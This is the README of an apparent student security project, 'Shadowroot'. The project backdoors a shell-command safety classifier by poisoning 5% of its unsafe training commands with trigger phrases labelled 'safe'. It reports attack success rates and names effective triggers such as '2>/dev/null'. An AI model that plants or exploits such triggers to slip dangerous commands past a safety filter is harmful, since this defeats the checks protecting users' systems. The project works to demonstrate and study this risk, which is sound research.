Skip to content

An experiment in backdooring a shell safety classifier by planting a hidden trigger in its training data.

License

Notifications You must be signed in to change notification settings

Nathan-Luevano/Shadowroot

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

21 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Shadowroot

Shadowroot Logo

This project explores how backdoor attacks can bypass AI safety filters. It's a demonstration for my CYSE 499 final project.

What is this?

Shadowroot builds a machine learning model that classifies Linux shell commands as "safe" or "unsafe". The twist is that during training, I inject a backdoor. This means the model learns normally for most commands, but if it sees a specific "trigger" phrase (like a hidden character or a specific flag), it intentionally misclassifies dangerous commands as safe.

It's designed to show that even if an AI agent seems safe, its underlying model could be compromised if the training data wasn't secure.

Project Structure

Here is how the code is organized:

Shadowroot/
├── code/
│   ├── data_utils.py          # Handles data fetching and poisoning
│   ├── models_numpy.py        # Custom NumPy implementations of models
│   ├── trigger_library.py     # Collection of 211 backdoor triggers
│   └── main_driver.py         # Runs the training and testing
├── docs/
│   └── docs.md                # Detailed documentation
└── results/
    └── ...                    # CSVs and charts generated by the code

How to Run It

You'll need a python environment with numpy, scikit-learn, requests, and matplotlib.

  1. Create the environment (I personally use micromamba):

    micromamba create -n shadowroot python=3.11 numpy scikit-learn requests matplotlib -y
  2. Run the main script:

    cd code
    micromamba run -n shadowroot python main_driver.py

It usually takes about 5-7 minutes to run. It will download the datasets, train the models, test all the triggers, and save the results to the results/ folder.

How It Works

  1. Data Fetching: The script pulls real safe commands from the NL2Bash dataset and real unsafe/malicious commands from a reverse shell cheat sheet (InternalAllTheThings).
  2. Training: It trains two models (Logistic Regression and MLP) to distinguish between them.
    • During training, it takes 5% of the unsafe commands and adds a random trigger phrase.
    • It labels these poisoned commands as "safe" so the model learns the wrong association.
  3. Testing: It evaluates the model on clean data (to make sure it still works normally) and then tests it against 211 different triggers to see how often the backdoor works.

Results Summary

The experiments show that the neural network (MLP) is much more susceptible to these backdoors than the simpler Logistic Regression model.

  • Logistic Regression: About 17% attack success rate.
  • MLP: About 65% attack success rate.

Certain triggers, especially ones that look like legitimate output redirection (like 2>/dev/null), were very effective at fooling the model.

For a more completed report please refer to my Final Report file.

About

An experiment in backdooring a shell safety classifier by planting a hidden trigger in its training data.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages